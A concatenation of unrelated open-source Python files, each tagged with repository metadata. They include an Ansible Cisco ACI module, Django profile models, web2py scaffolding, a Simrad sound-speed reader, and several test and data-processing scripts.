def __init__(self, key, sep):
# self.search_filter = json.loads(search_filter)
self.sep = sep
self.key = key
def __iter__(self):
for tweet in collection.find({"text": {"$exists": "true"}, 'lang':'en'}, {'text': 1, 'timestamp_ms':1}).limit(10000):
yield filter(None, [ word_processor(word) for word in tweet[self.key].split(self.sep)]), tweet['timestamp_ms']
client = MongoClient(hostname, port)
db = client[database_name]
collection = db[collection_name]
corpus = MyCorpus('text', sep)
word2vec = gensim.models.KeyedVectors.load_word2vec_format('/home/nipg1/Documents/summer_project/data/models/GoogleNews-vectors-negative300.bin', binary=True, limit=100000)
#word2vec = models.Word2Vec.load(os.path.join(DATA_DIR, '/home/nipg1/Documents/summer_project/data/models/GoogleNews-vectors-negative300.bin'))
dictionary = corpora.Dictionary.load(os.path.join(DATA_DIR, 'words.dict'))
tfidf = models.tfidfmodel.TfidfModel.load(os.path.join(DATA_DIR, 'tfidf_model'))
feature = []
# err = codecs.open(os.path.join(LOG_DIR, 'errors.txt'), 'w', encoding="utf-8")
metadata = codecs.open(os.path.join(LOG_DIR, 'metadata.tsv'), 'w', encoding="utf-8")
metadata.write("Tweet\tTime\n")
for tweet, epoch in MyCorpus2('text', sep):
tweet_tfidf = tfidf[dictionary.doc2bow(tweet)]
metadata.write(' '.join(tweet) + '\t')
# not_in_dict = []
v = np.zeros([200,])
for word, w_tfidf in tweet_tfidf:
if dictionary[word] in word2vec:
v += word2vec[dictionary[word]] * w_tfidf
# else:
# err.write(dictionary[word] + '\n')
# not_in_dict.append(dictionary[word])
v = normalize(v)
feature.append(v)
# metadata.write(' '.join(not_in_dict) + '\t')
metadata.write(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(epoch)/1000)) + '\n')
feature = np.array(feature)
| kgyl/twitter-data-analysis | scripts/not_used/process_data.py | Python | gpl-3.0 | 4,274 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_ap
short_description: Manage top level Application Profile (AP) objects (fv:Ap)
description:
- Manage top level Application Profile (AP) objects on Cisco ACI fabrics
notes:
- This module does not manage EPGs, see M(aci_epg) to do this.
- The used C(tenant) must exist before using this module in your playbook.
The M(aci_tenant) module can be used for this.
seealso:
- module: aci_tenant
- name: APIC Management Information Model reference
description: More information about the internal APIC class B(fv:Ap).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Swetha Chunduri (@schunduri)
version_added: '2.4'
options:
tenant:
description:
- The name of an existing tenant.
required: yes
aliases: [ tenant_name ]
ap:
description:
- The name of the application network profile.
required: yes
aliases: [ app_profile, app_profile_name, name ]
description:
description:
- Description for the AP.
aliases: [ descr ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- name: Add a new AP
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
ap: default
description: default ap
state: present
delegate_to: localhost
- name: Remove an AP
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
ap: default
state: absent
delegate_to: localhost
- name: Query an AP
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
ap: default
state: query
delegate_to: localhost
register: query_result
- name: Query all APs
aci_ap:
host: apic
username: admin
password: SomeSecretPassword
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: string
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: string
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: string
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: string
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: string
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
tenant=dict(type='str', aliases=['tenant_name']), # Not required for querying all objects
ap=dict(type='str', aliases=['app_profile', 'app_profile_name', 'name']), # Not required for querying all objects
description=dict(type='str', aliases=['descr'], required=False),
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['tenant', 'ap']],
['state', 'present', ['tenant', 'ap']],
],
)
ap = module.params['ap']
description = module.params['description']
state = module.params['state']
tenant = module.params['tenant']
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='fvTenant',
aci_rn='tn-{0}'.format(tenant),
module_object=tenant,
target_filter={'name': tenant},
),
subclass_1=dict(
aci_class='fvAp',
aci_rn='ap-{0}'.format(ap),
module_object=ap,
target_filter={'name': ap},
),
)
aci.get_existing()
if state == 'present':
aci.payload(
aci_class='fvAp',
class_config=dict(
name=ap,
descr=description,
),
)
aci.get_diff(aci_class='fvAp')
aci.post_config()
elif state == 'absent':
aci.delete_config()
aci.exit_json()
if __name__ == "__main__":
main()
| veger/ansible | lib/ansible/modules/network/aci/aci_ap.py | Python | gpl-3.0 | 6,984 |
"""Test that GOEnrichmentStudy fails elegantly given incorrect stimulus.
python test_goea_errors.py
"""
__copyright__ = "Copyright (C) 2016-2017, DV Klopfenstein, H Tang. All rights reserved."
__author__ = "DV Klopfenstein"
import sys
import os
from goatools.base import get_godag
from goatools.go_enrichment import GOEnrichmentStudy
from goatools.associations import read_associations
ROOT = os.path.dirname(os.path.abspath(__file__)) + "/../data/"
def init_goea(**kws):
"""Initialize GODag and GOEnrichmentStudy."""
godag = get_godag(os.path.join(os.getcwd(), "go-basic.obo"), loading_bar=None)
assoc = read_associations(ROOT + "association", no_top=True)
popul_ids = [line.rstrip() for line in open(ROOT + "population")]
methods = kws['methods'] if 'methods' in kws else ['not_bonferroni']
study_ids = [line.rstrip() for line in open(ROOT + "study")]
return GOEnrichmentStudy(popul_ids, assoc, godag, methods=methods), study_ids
def run_method_bad_ini():
"""Test attempting to use an unsupported method in initialization."""
goea, study_ids = init_goea(methods=['not_fdr'])
# Test that method(s) set during initialization are valid
goea.run_study(study_ids)
def run_method_bad_run():
"""Test attempting to use an unsupported method in run."""
goea, study_ids = init_goea()
# Test that method(s) set while running a GOEA on a study are valid
goea.run_study(study_ids, methods=['invalid_method'])
def test_all(log=sys.stdout):
"""Run all error tests."""
tests = [
(run_method_bad_ini, "FATAL: UNRECOGNIZED METHOD(not_fdr)"),
(run_method_bad_run, "FATAL: UNRECOGNIZED METHOD(not_bonferroni)"),
]
for test, exp_errmsg in tests:
try:
test()
except Exception as inst:
# Run next test
if str(inst).startswith(exp_errmsg):
log.write("Test PASSED. Expected error message seen: {EXP}\n".format(
EXP=exp_errmsg))
else:
raise Exception("EXPECTED({EXP}). ACTUAL({ACT})".format(
EXP=exp_errmsg, ACT=inst))
if __name__ == '__main__':
test_all()
# Copyright (C) 2016-2017, DV Klopfenstein, H Tang. All rights reserved.
| lileiting/goatools | tests/test_goea_errors.py | Python | bsd-2-clause | 2,261 |
# coding=UTF-8
from django.db import models
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
from django.utils.translation import ugettext as _
from django.template import loader, Context
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from django.conf import settings
import datetime
import cPickle as pickle
import base64
import Image, ImageFilter
import os.path
AVATAR_SIZES = (128, 96, 64, 48, 32, 24, 16)
class BaseProfile(models.Model):
"""
User profile model
"""
user = models.ForeignKey(User, unique=True)
date = models.DateTimeField(default=datetime.datetime.now)
latitude = models.DecimalField(max_digits=10, decimal_places=6, blank=True, null=True)
longitude = models.DecimalField(max_digits=10, decimal_places=6, blank=True, null=True)
location = models.CharField(max_length=255, blank=True)
class Meta:
abstract = True
def has_avatar(self):
return Avatar.objects.filter(user=self.user, valid=True).count()
def __unicode__(self):
return _("%s's profile") % self.user
def get_absolute_url(self):
return reverse("profile_public", args=[self.user])
class Avatar(models.Model):
"""
Avatar model
"""
#image = models.ImageField(upload_to="avatars/%Y/%b/%d")
image = models.ImageField(upload_to="avatars/")
user = models.ForeignKey(User)
date = models.DateTimeField(auto_now_add=True)
valid = models.BooleanField()
class Meta:
unique_together = (('user', 'valid'),)
def __unicode__(self):
return _("%s's Avatar") % self.user
def delete(self):
base, filename = os.path.split(self.image.path)
name, extension = os.path.splitext(filename)
for key in AVATAR_SIZES:
try:
os.remove(os.path.join(base, "%s.%s%s" % (name, key, extension)))
except:
pass
super(Avatar, self).delete()
def save(self):
for avatar in Avatar.objects.filter(user=self.user, valid=self.valid).exclude(id=self.id):
base, filename = os.path.split(avatar.image.path)
name, extension = os.path.splitext(filename)
for key in AVATAR_SIZES:
try:
os.remove(os.path.join(base, "%s.%s%s" % (name, key, extension)))
except:
pass
avatar.delete()
super(Avatar, self).save()
class EmailValidationManager(models.Manager):
"""
Email validation manager
"""
def verify(self, key):
try:
verify = self.get(key=key)
if not verify.is_expired():
verify.user.email = verify.email
verify.user.save()
verify.delete()
return True
else:
verify.delete()
return False
except:
return False
def getuser(self, key):
try:
return self.get(key=key).user
except:
return False
def add(self, user, email):
"""
Add a new validation process entry
"""
while True:
key = User.objects.make_random_password(70)
try:
EmailValidation.objects.get(key=key)
except EmailValidation.DoesNotExist:
self.key = key
break
template_body = "userprofile/email/validation.txt"
template_subject = "userprofile/email/validation_subject.txt"
site_name, domain = Site.objects.get_current().name, Site.objects.get_current().domain
body = loader.get_template(template_body).render(Context(locals()))
subject = loader.get_template(template_subject).render(Context(locals())).strip()
send_mail(subject=subject, message=body, from_email=None, recipient_list=[email])
user = User.objects.get(username=str(user))
self.filter(user=user).delete()
return self.create(user=user, key=key, email=email)
class EmailValidation(models.Model):
"""
Email Validation model
"""
user = models.ForeignKey(User, unique=True)
email = models.EmailField(blank=True)
key = models.CharField(max_length=70, unique=True, db_index=True)
created = models.DateTimeField(auto_now_add=True)
objects = EmailValidationManager()
def __unicode__(self):
return _("Email validation process for %(user)s") % { 'user': self.user }
def is_expired(self):
return (datetime.datetime.today() - self.created).days > 0
def resend(self):
"""
Resend validation email
"""
template_body = "userprofile/email/validation.txt"
template_subject = "userprofile/email/validation_subject.txt"
site_name, domain = Site.objects.get_current().name, Site.objects.get_current().domain
key = self.key
body = loader.get_template(template_body).render(Context(locals()))
subject = loader.get_template(template_subject).render(Context(locals())).strip()
send_mail(subject=subject, message=body, from_email=None, recipient_list=[self.email])
self.created = datetime.datetime.now()
self.save()
return True
| bithinalangot/ecidadania-dev | src/apps/thirdparty/userprofile/models.py | Python | gpl-3.0 | 5,338 |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 0, transform = "BoxCox", sigma = 0.0, exog_count = 100, ar_order = 12); | antoinecarme/pyaf | tests/artificial/transf_BoxCox/trend_PolyTrend/cycle_0/ar_12/test_artificial_128_BoxCox_PolyTrend_0_12_100.py | Python | bsd-3-clause | 263 |
from biicode.common.test import model_creator as mother, testfileutils
from biicode.common.edition.processors.cpp_implementation import CPPImplementationsProcessor
from biicode.common.model.cells import SimpleCell
from biicode.common.model.bii_type import BiiType, CPP
from nose_parameterized import parameterized
from biicode.common.model.brl.block_cell_name import BlockCellName
from biicode.common.model.blob import Blob
from biicode.common.model.content import Content
from biicode.common.edition.parsing.cpp.drl_parser import DRLCPPParser
from biicode.common.edition.processors.parse_processor import ParseProcessor
from biicode.common.edition.block_holder import BlockHolder
from biicode.common.model.resource import Resource
from mock import Mock
from biicode.common.output_stream import OutputStream
from biicode.common.test.bii_test_case import BiiTestCase
crypto_header = """
namespace CryptoPP {
class CAST
{
protected:
static const word32 S[8][256];
};
}
"""
crypto_body = """
#include "cryptopp/cryptopp/pch.h"
#include "cryptopp/cryptopp/cast.h"
namespace CryptoPP{
// CAST S-boxes
int CAST::x = 1;
int CAST::y;
int z;
const word32 CAST::S[8][256] = {
{
0x30FB40D4UL, 0x9FA0FF0BUL, 0x6BECCD2FUL, 0x3F258C7AUL,
0x1E213F2FUL, 0x9C004DD3UL, 0x6003E540UL, 0xCF9FC949UL,
0xBFD4AF27UL, 0x88BBBDB5UL, 0xE2034090UL, 0x98D09675UL,
0x6E63A0E0UL, 0x15C361D2UL, 0xC2E7661DUL, 0x22D4FF8EUL
}}
"""
basic_class_header = '''
class MyClass{
public:
MyClass();
protected:
static int a;
};'''
basic_class_body = '''MyClass::MyClass(){}'''
class_static_var_body = '''int MyClass::a = 3;'''
basic_function_header = '''
void myFunction();'''
basic_function_body = '''void myFunction(){}'''
ns_class_header = '''
namespace NS{
class MyClass{
MyClass();
};
}'''
ns_class_body = '''namespace NS{
MyClass::MyClass(){}
}'''
ns_class_body2 = '''NS::MyClass::MyClass(){}'''
ns_function_header = '''
namespace NS{
void myFunction();
}'''
ns_function_body = '''namespace NS{
void myFunction(){}
}'''
ns_function_body2 = '''
void NS::myFunction(){}
'''
main_body = """
#include "cryptopp/cryptopp/pch.h"
#include "cryptopp/cryptopp/cast.h"
int main(){
return 0;
}
"""
no_main_body = """
#include "cryptopp/cryptopp/pch.h"
#include "cryptopp/cryptopp/cast.h"
"""
poco_header = """#ifndef SAX_LexicalHandler_INCLUDED
#define SAX_LexicalHandler_INCLUDED
#include "Poco/XML/XML.h"
#include "Poco/XML/XMLString.h"
namespace Poco {
namespace XML {
class XML_API LexicalHandler
{
public:
virtual void startDTD(const XMLString& name) = 0;
virtual void endDTD() = 0;
virtual void endCDATA() = 0;
virtual void comment(const XMLChar ch[], int start, int length) = 0;
protected:
virtual ~LexicalHandler();
};
} } // namespace Poco::XML
#endif // SAX_LexicalHandler_INCLUDED
"""
poco_src_body = """#include "Poco/SAX/LexicalHandler.h"
namespace Poco {
namespace XML {
LexicalHandler::~LexicalHandler()
{
}
} } // namespace Poco::XML
"""
using_ns_body = """using blobstore::onblocks::utils::ceilDivision;"""
using_ns_header = """namespace blobstore {
namespace onblocks {
namespace utils {
uint32_t intPow(uint32_t base, uint32_t exponent);
uint32_t ceilDivision(uint32_t dividend, uint32_t divisor);
uint32_t maxZeroSubtraction(uint32_t minuend, uint32_t subtrahend);
}
}
}
"""
class CPPImplementationProcessorTest(BiiTestCase):
'''tests de CPPImplementation processor from 2 sources, from some source files in tests folder
and from code snippets directly in this file'''
def _process_from_contents(self, contents):
'''param contents: dict{name:code snippets}.
Will create a ProjectHolder, fill with the data and process it'''
resources = []
for name, content in contents.iteritems():
cell = SimpleCell(name, CPP)
block_name = cell.name.block_name
resources.append(Resource(cell, Content(name, load=Blob(content),
parser=DRLCPPParser())))
block_holder = BlockHolder(block_name, resources)
self._process(block_holder)
return block_holder
def _process_from_files(self, names):
'''param names: iterable of BlockCellNames. The user will be stripped, and the remaining
will be loaded from the test folder.
Will create a ProjectHolder, fill with the data and process it'''
block_holder = mother.get_block_holder(names, BiiType(CPP))
self._process(block_holder)
return block_holder
def _process(self, block_holder):
'''helper method that actually invokes the processor'''
for r in block_holder.simple_resources:
r.content.parse()
processor = CPPImplementationsProcessor()
processor.do_process(block_holder, Mock())
@parameterized.expand([
('user/geom/sphere.h', 'user/geom/sphere.cpp'),
# find extern implementations of fonts in freeglut
('user/glut/src/freeglut_font.c', 'user/glut/src/freeglut_font_data.c'),
('user/glut/include/GL/freeglut_std.h', 'user/glut/src/freeglut_glutfont_definitions.c'),
('user/gtest/include/gtest/internal/gtest-filepath.h', 'user/gtest/src/gtest-filepath.cc'),
('user/solver/systemsolver.h', 'user/solver/systemsolver.cpp'),
('user/sdl/include/SDL.h', 'user/sdl/src/SDL.c'),
('user/sdl/include/SDL_video.h', 'user/sdl/src/video/SDL_surface.c')
])
def test_implementation_from_files(self, header, source):
'''basic check that header is implemented by source'''
sources = [header, source]
block_holder = self._process_from_files(sources)
header = BlockCellName(header)
source = BlockCellName(source)
header_cell = block_holder[header.cell_name].cell
self.assertEqual({source}, header_cell.dependencies.implicit)
def test_find_csparse_implementations(self):
'''This tests check that the cs.h file requires or is implemented by all other files
in csparse, (they are all *.c files)'''
sources = []
for file_ in testfileutils.get_dir_files('csparse'):
sources.append('user/csparse/' + file_)
block_holder = self._process_from_files(sources)
#Checks
header = block_holder['cs.h'].cell
sources = set(sources)
sources.remove('user/csparse/cs.h')
self.assertEqual(sources, header.dependencies.implicit)
@parameterized.expand([
(crypto_header, crypto_body),
(basic_class_header, basic_class_body),
(basic_class_header, class_static_var_body),
(basic_function_header, basic_function_body),
(ns_class_header, ns_class_body),
(ns_class_header, ns_class_body2),
(ns_function_header, ns_function_body),
(ns_function_header, ns_function_body2),
(poco_header, poco_src_body)
])
def test_implementation_from_contents(self, header, source):
'''basic check that header is implemented by source. The contents of the files are defined
in snippets of code as strings'''
sources = {'user/block/header.h': header,
'user/block/body.cpp': source}
block_holder = self._process_from_contents(sources)
header = BlockCellName('user/block/header.h')
source = BlockCellName('user/block/body.cpp')
header_cell = block_holder['header.h'].cell
self.assertEqual({source}, header_cell.dependencies.implicit)
#Negative check
source_cell = block_holder['body.cpp'].cell
self.assertEqual(set(), source_cell.dependencies.implicit)
@parameterized.expand([
('', ''),
(crypto_header, ''),
('', basic_class_body),
(using_ns_header, using_ns_body)
])
def test_negative(self, header, source):
'''some basic negative tests, from snippets of code'''
sources = {'user/block/header.h': header,
'user/block/body.cpp': source}
block_holder = self._process_from_contents(sources)
header = BlockCellName('user/block/header.h')
source = BlockCellName('user/block/body.cpp')
header_cell = block_holder[header.cell_name].cell
self.assertEqual(set(), header_cell.dependencies.implicit)
#Negative check
source_cell = block_holder[source.cell_name].cell
self.assertEqual(set(), source_cell.dependencies.implicit)
def test_has_main(self):
'''some basic negative tests, from snippets of code'''
sources = {'user/block/body.cpp': main_body}
block_holder = self._process_from_contents(sources)
ParseProcessor().do_process(block_holder, OutputStream())
self.assertTrue(block_holder._resources['body.cpp'].content.parser.has_main_function())
sources = {'user/block/body.cpp': no_main_body}
block_holder = self._process_from_contents(sources)
ParseProcessor().do_process(block_holder, OutputStream())
self.assertFalse(block_holder._resources['body.cpp'].content.parser.has_main_function())
| zhangf911/common | test/edition/processors/cpp_implementation_test.py | Python | mit | 9,113 |
# -*- coding: utf-8 -*-
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()
if not request.env.web2py_runtime_gae:
## if NOT running on Google App Engine use SQLite or other DB
db = DAL('sqlite://storage.sqlite',pool_size=1,check_reserved=['all'])
else:
## connect to Google BigTable (optional 'google:datastore://namespace')
db = DAL('google:datastore')
## store sessions and tickets there
session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db)
crud, service, plugins = Crud(db), Service(), PluginManager()
## create all tables needed by auth if not custom tables
auth.define_tables(username=False, signature=False)
## configure email
mail = auth.settings.mailer
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = 'you@gmail.com'
mail.settings.login = 'username:password'
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.
## register with janrain.com, write your domain:api_key in private/janrain.key
from gluon.contrib.login_methods.rpx_account import use_janrain
use_janrain(auth, filename='private/janrain.key')
#########################################################################
## Define your tables below (or better in another model file) for example
##
## >>> db.define_table('mytable',Field('myfield','string'))
##
## Fields can be 'string','text','password','integer','double','boolean'
## 'date','time','datetime','blob','upload', 'reference TABLENAME'
## There is an implicit 'id integer autoincrement' field
## Consult manual for more options, validators, etc.
##
## More API examples for controllers:
##
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
| AbsentMoniker/ECE463Honors | web2py/applications/welcome/models/db.py | Python | gpl-2.0 | 3,619 |
import logging
import re
import numpy
logger = logging.getLogger(__name__)
from hyo2.soundspeed.formats.readers.abstract import AbstractTextReader
from hyo2.soundspeed.profile.dicts import Dicts
from hyo2.soundspeed.base.callbacks.cli_callbacks import CliCallbacks
from hyo2.soundspeed.temp import coordinates
from hyo2.soundspeed.temp.regex_helpers import Profile, parseNumbers, getMetaFromTimeRE
# Identifier Input data Data to be used Comment
ssp_fmts_doc = '''
S00 D,c D,c
S01 D,c,T,S D,c,a(D,T,S,L) Same as S12, but used immediately.
S02 D,T,S D,c(D,T,S,L),a(D,T,S,L) Same as S22, but used immediately.
S03 D,T,C D,c(D,T,C,L),a(D,T,S,L) Same as S32,but used immediately.
S04 P,T,S D(P,T,S,L),c(P,T,S,L),a(P,T,S,L) Same as S42,but used immediately.
S05 P,T,C D(P,T,C,L),c(P,T,C,L),a(P,T,C,L) Same as S52,but used immediately.
S06 D,c,a D,c,a Same as S11,but used immediately.
S10 D,c D,c
S11 D,c,a D,c,a
S12 D,c,T,S D,c,a(D,T,S,L)
S13 D,c,a,f D,c,a Frequency dependent
S20 D,T,S D,c(D,T,S,L)
S21 D,T,S,a D,c(D,T,S,L),a
S22 D,T,S D,c(D,T,S,L),a(D,T,S,L)
S23 D,T,S,a,f D,c(D,T,S,L),a Frequency dependent
S30 D,T,C D,c(D,T,S,L)
S31 D,T,C,a D,c(D,T,S,L),a
S32 D,T,C D,c(D,T,S,L),a(D,T,S,L)
S33 D,T,C,a,f D,c(D,T,S,L),a Frequency dependent
S40 P,T,S D(P,T,S,L),c(P,T,S,L)
S41 P,T,S,a D(P,T,S,L),c(P,T,S,L),a
S42 P,T,S D(P,T,S,L),c(P,T,S,L),a(P,T,S,L)
S43 P,T,S,a,f D(P,T,S,L),c(P,T,S,L),a Frequency dependent
S50 P,T,C D(P,T,C,L),c(P,T,C,L)
S51 P,T,C,a D(P,T,C,L),c(P,T,C,L),a
S52 P,T,C D(P,T,C,L),c(P,T,C,L),a(P,T,C,L)
S53 P,T,C,a,f D(P,T,C,L),c(P,T,C,L),a Frequency dependent
'''
SSP_Formats = {}
for fmt in ssp_fmts_doc.splitlines():
m = re.match(r'\s*(?P<fmt>S\d\d)\s*(?P<fields>[\w,]*)\s', fmt)
if m:
SSP_Formats[m.group('fmt')] = [
t.replace('a', 'absorption').replace('c', 'soundspeed').replace('f', 'frequency').replace('D',
'depth').replace(
'T', 'temperature').replace('S', 'salinity') for t in m.group('fields').split(',')]
class Simrad(AbstractTextReader):
"""Simrad reader -> CTD style
"""
def __init__(self):
super(Simrad, self).__init__()
self.desc = "Simrad"
self._ext.add('ssp')
self._ext.add('s??')
def read(self, data_path, settings, callbacks=CliCallbacks(), progress=None):
logger.debug('*** %s ***: start' % self.driver)
self.s = settings
self.cb = callbacks
self.init_data() # create a new empty profile list
self._read(data_path=data_path)
self._parse_header()
self._parse_body()
# initialize probe/sensor type
self.ssp.cur.meta.sensor_type = Dicts.sensor_types['CTD']
self.ssp.cur.meta.probe_type = Dicts.probe_types['Simrad']
self.fix()
self.finalize()
logger.debug('*** %s ***: done' % self.driver)
return True
def _parse_header(self):
meta = {}
m = re.search(r'''\$[A-Z][A-Z](?P<fmt>S\d\d), #fmt is between 00 and 53
(?P<id>\d+),
(?P<nmeasure>\d+),
(?P<hour>\d\d)(?P<minute>\d\d)(?P<second>\d\d),
(?P<day>\d\d),
(?P<mon>\d\d),
(?P<yr>\d+),
''', self.lines[0], re.VERBOSE) # ignoring the optional fields of first line
if m:
meta.update(getMetaFromTimeRE(m))
meta['DataSetID'] = m.group('id')
meta['Format'] = "SSP " + m.group('fmt')
meta['fmt'] = m.group('fmt')
m = re.search(r'''(?P<lat>[\d.]+,[NS]),
(?P<lon>[\d.]+,[EW]),
''', self.lines[1], re.VERBOSE) # try the optional second line
if not m:
m = re.search(r'''(?P<lat>[\d.]+,[NS]),
(?P<lon>[\d.]+,[EW]),
''', self.lines[-1], re.VERBOSE) # try at the end of file
if m:
location = coordinates.Coordinate(m.group('lat'), m.group('lon'))
meta.update(Profile.getMetaFromCoord(location))
meta['filename'] = self.fid._path
self.rawmeta = meta
def _parse_body(self):
"""
' Simrad SSP format (See EM Series 1002 Operator Manual for details):
' Start ID, $ item 1
' Talker ID AA
' Datagram ID, S10,
' Data Set ID, xxxxx, item 2
' Number of measurements, xxxx, item 3
' UTC time of data acquisition, hhmmss, item 4
' Day of data acquisition, xx, item 5
' Month of data acquisition, xx, item 6
' Year of data acquisition, xxxx, item 7
' First good depth in m x.x,
' Corresponding Sound Velocity in m/s, x.x,
' Skip temp, sal, absorption coeff fields ,,,
' End of line CRLF
' Then, repeat good depth, sv,,,,CRLF until all NPTS are listed.
From the Simrad Datagrams docs:
Data Description Format Length Valid range Note
Start identifier = $ Always 24h 1
Talker identifier aa 2 Capital letters
Datagram identifier Always Sxx, 4 S00to S53 1,2
Data set identifier xxxxx, 6 00000 to 65535
Number of measurements = N xxxx, 5 0001 to 9999 9
UTC time of data acquisition hhmmss, 7 000000 to 235959 3
Day of data acquisition xx, 3 00 to 31 3
Month of data acquisition xx, 3 00 to 12 3
Year of data acquisition xxxx, 5 0000 to 9999 3
N entries of the next 5 fields See note 4
Depth in m fromwater level or
Pressure in MPa
x.x, 2 0 to 12000.00 0 to
1.0000
4
Sound velocity in m/s x.x, 1 1400 to 1700.00
Temperature in _C x.x, 1 5 to 45.00
Salinity in parts per thousand or
Conductivity in S/m
x.x, 1 0 to 45.00 0 to 7.000
Absorption coefficient in dB/km x.x 0 0 to 200.00 5
Data set delimiter CRLF 2 0Dh 0Ah
End of repeat cycle
Latitude in degrees and minutes, plus
optional decimal minutes
llll.ll, Variable 5 0000 to 9000.0... 6
Latitude N/S a, 2 N or S 6
Longitude in degrees and minutes, plus
optional decimal minutes
yyyyy.yy, Variable 6 00000 to 18000.0... 6
Longitude E/W a, 2 Eor W 6
Atmospheric pressure in MPa x.x, 1 0 to 1.0000 6
Frequency in Hz xxxxxx, Variable 7
User given comments c c Variable 6
Optional checksum *hh 8
End of datagram delimiter = \CRLF 5Ch 0Dh 0Ah 3
Note:
1 The datagram identifier identifies what type of data is
included. This is shown in the following table where D is
depth, P is pressure, S is salinity, C is conductivity, c is
soundspeed, 'a' is absorption coefficient, f is frequency and
L is latitude. The notation c(T,S) indicates for example that
the soundspeed is to be calculated from the temperature and
salinity input data. When pressure is used, the atmospheric
pressure must be given if the pressure is absolute, otherwise
the pressure must be given re the sea level and the
atmospheric pressure must be zero.
See top of module ssp_fmts_doc for format specifiers.
"""
metadata = self.rawmeta
# read any of the above formats
profile_data = parseNumbers(self.lines,
[(n, numpy.float32) for n in SSP_Formats[metadata['fmt']]],
r"\s*,\s*", pre=r'^\s*', post=r'[,.\s\d]*$', ftype='SSP')
p = Profile(profile_data, ymetric="depth", attribute="soundspeed", metadata=metadata)
self.ssp.append_profile(p.ConvertToSoundSpeedProfile())
| hydroffice/hyo_soundspeed | hyo2/soundspeed/formats/readers/simrad.py | Python | lgpl-2.1 | 8,879 |
# -*- coding: utf-8 -*-
"""
Created on Mon May 23 13:15:10 2016
@author: nn31
"""
import pandas as pd
import pickle
import re
import numpy as np
#read in cmmi data
cmmi = pd.read_csv("/Volumes/DCCRP_projects/CMMI/data/QDACT 05-03-2016.csv",
parse_dates=['AssessmentDate','AdmissionDate','DischargeDate','PalliativeDischargeDate'])
dd = pickle.load(open("/Users/nn31/Dropbox/40-githubRrepos/qdact-basic-analysis/notebooks/python_scripts/02_data_dictionary_dict.p", "rb" ))
variables = list(dd.keys())
variables.sort()
